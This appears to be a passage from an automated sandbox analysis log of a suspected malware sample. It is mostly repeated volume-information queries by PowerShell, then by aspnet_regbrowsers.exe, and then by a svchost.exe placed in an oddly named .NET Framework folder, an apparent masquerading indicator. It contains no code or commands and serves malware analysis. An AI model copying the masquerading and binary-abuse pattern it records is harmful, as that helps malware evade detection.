                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
